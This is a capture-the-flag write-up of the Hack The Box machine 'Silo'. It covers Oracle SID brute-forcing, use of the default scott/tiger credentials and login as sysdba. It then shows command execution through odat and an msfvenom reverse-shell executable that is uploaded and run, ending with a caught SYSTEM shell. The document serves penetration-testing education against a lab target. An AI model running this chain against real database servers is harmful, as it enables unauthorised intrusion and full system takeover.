---
title: "HTB: Silo"
date: 2021-07-26
classes: wide
categories:
  - Hackthebox
tag:
  - oracle database   
  - default credentials 
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/silo/silo.png" alt="">

# Summary 

Silo was a machine that really taught how to enumerate an oracle sql database above anything else. You first bruteforce SIDS for the database which are kinda like database names but for oracle. With these SIDS you then bruteforce usernames and find that a default account is enabled on one of the SIDS which has sysdba privilege meaning you can run everything as sysdba which is kinda like running sudo but for oracle which gives you permissions to execute code on the remote machine, but more importantly allows you to upload a malicious exe file and execute it which gives you a reverse shell as system because the oracle database is running in the context of system, meaning there is no priv esc required for this machine. So without further or do lets get into SIlo from hackthebox!

# Recon

```
$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Sat Jul 24 15:07:33 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.094s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open     oracle-tns     Oracle TNS listener 11.2.0.2.0 (unauthorized)
3367/tcp  filtered satvid-datalnk
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49159/tcp open     oracle-tns     Oracle TNS listener (requires service name)
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
--snipped---
```

And then an all port scan 

```
$nmap -p- --min-rate 1000 -oN nmap/all-ports.txt $ip                                                                                                                                                                                    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:12 BST
Stats: 0:02:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 45.74% done; ETC: 15:18 (0:03:17 remaining)
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.077s latency).
Not shown: 45308 closed ports, 20215 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49159/tcp open  unknown
49161/tcp open  unknown
```
# Enumeration of Services

## SMB 445

There wasn't anything I could get out of smb and just got access denied 

```
$smbclient -L //$ip/
Enter WORKGROUP\purplerabbit's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/silo]
└──╼ $smbmap -H $ip
[!] 445 not open on 10.10.10.82....
```

## HTTP 80

Going over to the webpage shows a default windows IIS Server page

Running a gobuster on this webpage showed no directories

I did a virtualhost bruteforce on the server but that didn't return anything of value

## RPC 135

Null RPC was disabled

```
$rpcclient -U '' $ip
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
```

## Oracle TNS Listener 1521

Oracle TNS Listener is a separate process that receives incoming traffic for the database server. Hacktricks has some good information on enumerating this service <https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener> 

Looking at the version shows that its running 11.2.0.2.0

```
$nmap --script "oracle-tns-version" -p 1521 -T4 -sV $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:26 BST
Nmap scan report for 10.10.10.82
Host is up (0.12s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds
```

A google search shows that there are no vulnerabilities related to this version <https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/version_id-107266/Oracle-Database-Server-11.2.0.2.html>

Attempting to enuemrate SIDS with metasploit doesn't work

```
msf6 auxiliary(scanner/oracle/sid_enum) > exploit

[-] 10.10.10.82:1521      - TNS listener protected for 10.10.10.82...
[*] 10.10.10.82:1521      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

So I attempted to bruteforce SIDS using a metasploit module and I got a few SIDS

```
msf6 auxiliary(admin/oracle/sid_brute) > exploit
[*] Running module against 10.10.10.82

[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID ''
```

Next I attempted to enumerate usernames for these SIDS using odat <https://github.com/quentinhardy/odat> Which I installed by following its instructions in the git repo.

I couldn't get any valid users with CLRExtProc and PLSExtProc however for XE odat found credentials 


```
$python3 odat.py all -s 10.10.10.82 -p 1521 -d XE 
--snipped--
+] Valid credentials found: scott/tiger. Continue...
--snipped--
```

Next I installed sqlplus which was a real pain, however this guide <https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573> helped a lot.

I was able to login to the oracle database using sqlplus, however there wasn't much to see apart from the default databases. 

```
$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE

SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE
```

Looking at privileges shows this user only has connect and resource

```
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
```

Running odat shows I can't do anything of interest 

```
$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE
```

This next part was probably the hardest part of the machine because from the researching I did I couldn't find anything related to this part. But you needed to see that the scott user had the sysdba privilege which is kinda like sudo but for oracle <https://docs.oracle.com/database/121/ADMQS/GUID-2033E766-8FE6-4FBA-97E0-2607B083FA2C.htm#ADMQS12004> 

Running sqlplus but with "as sysdba" shows we have a lot more privileges.

```
$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE as sysdba

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO
--snipped--
```

Running odat to see what we can do with sysdba shows we can do a lot more

```bash
$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE --sysdba
[+] Checking if target 10.10.10.82:1521 is well configured for a connection...    
[+] According to a test, the TNS listener 10.10.10.82:1521 is well configured. Continue...                                                                                                                                                    

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?            
[+] The target is vulnerable to a remote TNS poisoning                                                                                                                                                                                        
                                                           
[2] (10.10.10.82:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[2.1] UTL_HTTP library ?        
[+] OK                         
[2.2] HTTPURITYPE library ?
[+] OK                                                                                                                 
[2.3] UTL_FILE library ?                                                                                                                                                                                                                      
[+] OK                                                                                                                                                                                                                                        
[2.4] JAVA library ?                                                                                                                                                                                                                          
[-] KO                                                                                                                                                                                                                                        
[2.5] DBMSADVISOR library ?                                                                                                                                                                                                                   
[+] OK                                                                                                                                                                                                                                        
[2.6] DBMSSCHEDULER library ?                                                                                                                                                                                                                 
[+] OK                                                                                                                                                                                                                                        
[2.7] CTXSYS library ?                                                                                                                                                                                                                        
[+] OK                                                                                                                                                                                                                                        
[2.8] Hashed Oracle passwords ?                                                                                                                                                                                                               
[+] OK                                                                                                                                                                                                                                        
[2.9] Hashed Oracle passwords from history?                                                                                                                                                                                                   
[+] OK        
--snipped--
```

# Shell as System

Looking at the diagram on odat to see what I can do shows I can do a number of things

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/silo/1.png" alt="">

I will first check to see if I can execute code on the webserver

```
$python3 odat.py dbmsscheduler -s $ip -d XE -U scott -P tiger --exec "ping 10.10.16.91" --sysdba

[1] (10.10.10.82:1521): Execute the `ping 10.10.16.91` on the 10.10.10.82 server
[+] The `ping 10.10.16.91` command was executed on the 10.10.10.82 server
[+] The Job is running
```

Running tcpdump showed that I received a ping from the remote host

```
$sudo tcpdump -i tun0 icmp
[sudo] password for purplerabbit: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:43:03.407736 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 1, length 40
08:43:03.407841 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 1, length 40
08:43:04.588852 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 2, length 40
08:43:04.588905 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 2, length 40
08:43:05.612807 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 3, length 40
08:43:05.612873 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 3, length 40
08:43:06.453765 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 4, length 40
08:43:06.453822 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 4, length 40
```

I then tried for several minutes to transfer netcat to get a reverse shell but I kept getting this error when I tried to transfer via smb or powershell

```
[-] The Job has failed: ORA-27370: job slave failed to launch a job of type EXECUTABLE
ORA-27300: OS system dependent operation:accessing job scheduler service failed with status: 109
ORA-27301: OS failure message: The pipe has been ended.
ORA-27302: failure occurred at: sjsec 9
ORA-27303: additional information: The pipe has been ended.
```

So I resorted to another way of getting the reverse shell to the machine

First I generated an x86 windows reverse shell with msfvenom

```
$msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.91 LPORT=4444 -f exe > shell.exe
```

Next I uploaded this file to the remote machine using the utlfile module from odat running the command

```
$python3 odat/odat.py utlfile -s $ip -d XE -U scott -P tiger --putFile "C:\Windows\Temp" shell.exe shell.exe --sysdba
```

I then executed this exe file that uploaded using the externaltable modules (note that I'm getting example syntax for all of these modules from odat's wiki <https://github.com/quentinhardy/odat/wiki/externaltable>)

```
$python3 odat/odat.py externaltable -s $ip -d XE -U scott -P tiger --exec "C:\Windows\Temp" shell.exe --sysdba
```

This then gave a reverse shell into the system as system

```
$nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.16.91] from silo.htb [10.10.10.82] 49168
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
```

Meaning that the oracle sql databasa was running in the context of system.

That was silo from hackthebox! Hope you enjoyed



